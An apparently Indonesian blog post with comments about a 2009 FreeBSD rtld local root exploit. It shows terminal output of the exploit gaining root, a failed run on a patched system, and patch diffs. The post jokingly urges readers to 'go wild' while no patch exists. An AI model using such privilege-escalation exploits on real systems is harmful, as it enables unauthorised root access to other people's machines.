FreeBSD rtld 0day exploit
King Cope publish local exploit ini ke FD-Lists.
[bofh@begok ~/hack]$ uname -a FreeBSD begok.xxxx.de 7.0-STABLE FreeBSD 7.0-STABLE #1: Fri Mar 27 11:24:51 WIT 2009 root@begok.xxxxx.de:/usr/obj/usr/src/sys/BEGOK i386 [bofh@begok ~/hack]$ ./fbsd-local-2009.sh fbsd-local-2009.sh FreeBSD local r00t zeroday by Kingcope November 2009 env.c: In function 'main': env.c:5: warning: incompatible implicit declaration of built-in function 'malloc' env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy' env.c:11: warning: incompatible implicit declaration of built-in function 'execl' 8:35 /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for /libexec/ld-elf.so.1: environment corrupt; missing value for ALEX-ALEX # id uid=1007(bofh) gid=1007(bofh) euid=0(root) groups=1007(bofh)
Publikasi ini jelas akan langsung dimanfaatkan dengan cepat oleh para hacker/cracker yang bisa mendapatkan akses local ke mesin-mesin FreeBSD. Rasanya belum ada patch untuk saat ini. So, go wild guys? :p.
** Thanks buat temon untuk testing exploitnya, as currently I don’t have FBSD to test. *sigh*.
BUgs ini Affected ke semua FreeBSD 7.x dan versi terbaru 8.0. untuk Un-Official patch ada disini:
http://people.freebsd.org/~cperciva/rtld.patch
jackd@k-elektronik%uname -r
7.1-RELEASE-p2
jackd@k-elektronik%sh rtdl.sh
DemoRTLD.sh SocketCode env env.c fbsd-rtld-full-package openssh program.c program.o rtdl.sh w00t.so.1.0 FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function ‘main’:
env.c:5: warning: incompatible implicit declaration of built-in function ‘malloc’
env.c:9: warning: incompatible implicit declaration of built-in function ’strcpy’
env.c:11: warning: incompatible implicit declaration of built-in function ‘execl’
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; aborting
jackd@k-elektronik%
Stealth sudah menemukan bugs ini jauh hari sebelum Kingcope mempublishnya ke FD-LIST..
http://c-skills.blogspot.com/2009/11/always-check-return-value.html
jackd
1 Dec 09 at 8:58 pm
Colin Percival allready make it
http://people.freebsd.org/~cperciva/rtld.patch
Thats for Release 6.x, The problem is those patch doesn’t work for Release 7.2 (my box are 7.2 release) because inexistance of LD_ ELF_HINTS_PATH, but you can edited the patch from CPercival, erase those elf hints lines, or you can grab it at here :
http://bit.ly/739WJ4
Pretty lame isn’t it after 24 hours but there is no patch allready published at security page FBSD.
Primata Tampan
2 Dec 09 at 6:04 am
For 7.2-REL you can use this patch:
— /usr/src/libexec/rtld-elf/rtld.c 2008-11-25 03:59:29.000000000 +0100
+++ /usr/src/libexec/rtld-elf/rtld.c.new 2009-12-01 13:09:15.000000000 +0100
@@ -358,11 +358,12 @@
/*
*potentially un-safe variables.
*/
if (!trust) {
- unsetenv(LD_ “PRELOAD”);
- unsetenv(LD_ “LIBMAP”);
- unsetenv(LD_ “LIBRARY_PATH”);
- unsetenv(LD_ “LIBMAP_DISABLE”);
- unsetenv(LD_ “DEBUG”);
+ if (unsetenv(LD_ “PRELOAD”) || unsetenv(LD_ “LIBMAP”) ||
+ unsetenv(LD_ “LIBRARY_PATH”) || unsetenv(LD_ “LIBMAP_DISABLE”) ||
+ unsetenv(LD_ “DEBUG”)) {
+ _rtld_error(”environment corrupt; aborting”);
+ die();
+ }
}
ld_debug = getenv(LD_ “DEBUG”);
libmap_disable = getenv(LD_ “LIBMAP_DISABLE”) != NULL;
Kalpi
3 Dec 09 at 9:58 am
@Permata Tampan:: Patch tersebut buat 8.0, ga ada patch buat 6.x karena ga affected.. untuk 7.x emang ga jalan, so edit manual needed..
Neo Kecoak Elektronik
3 Dec 09 at 12:00 pm
bang bang . ak pendatang baru ni
ajarin ya
d'elcano
11 Dec 09 at 9:11 pm